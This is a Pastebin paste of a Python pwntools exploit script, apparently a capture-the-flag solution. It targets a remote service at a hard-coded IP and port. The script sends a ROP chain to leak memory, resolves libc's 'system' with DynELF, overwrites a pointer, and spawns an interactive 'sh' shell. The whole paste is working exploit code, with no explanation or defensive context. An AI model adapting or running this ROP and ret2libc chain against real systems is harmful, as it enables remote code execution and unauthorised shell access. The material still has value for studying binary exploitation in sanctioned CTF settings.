Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- HOST, PORT = "49.236.136.140", "15010"
- # HOST, PORT = "0.0.0.0", 31337
- r = remote(HOST, PORT)
- def ii(x): return r.sendline(str(x))
- read = u32(r.recvn(4))
- def rop(ptr, a, b, c):
- return 'a' * 8 + p32(0x10578) \
- + p32(0) + p32(ptr) + p32(0) + p32(a) + p32(b) + p32(c) + p32(0) + p32(0x1055c) \
- + p32(0) * 7 + p32(0x104f8)
- payload = 'sh\x00'
- def init():
- global r
- r.send(rop(0x2100c, 0, 0x21018, 8 + len(payload)))
- time.sleep(1)
- r.send(p32(0x102ec) + p32(0x10324) + payload)
- init()
- def leak(addr):
- global r
- r.send((rop(0x2101c, 1, addr, 0x10)))
- try:
- data = r.recv(1024)
- except:
- r.close()
- r = remote(HOST, PORT)
- init()
- return leak(addr)
- print hex(addr), `data`
- return data
- print hex(read)
- d = DynELF(leak, read)
- system = d.lookup('system')
- r.send(rop(0x2100c, 0, 0x21018, 4))
- time.sleep(1)
- r.send(p32(system))
- pause()
- r.send(rop(0x21018, 0x21020, 0, 0))
- r.interactive()
Add Comment
Please, Sign In to add comment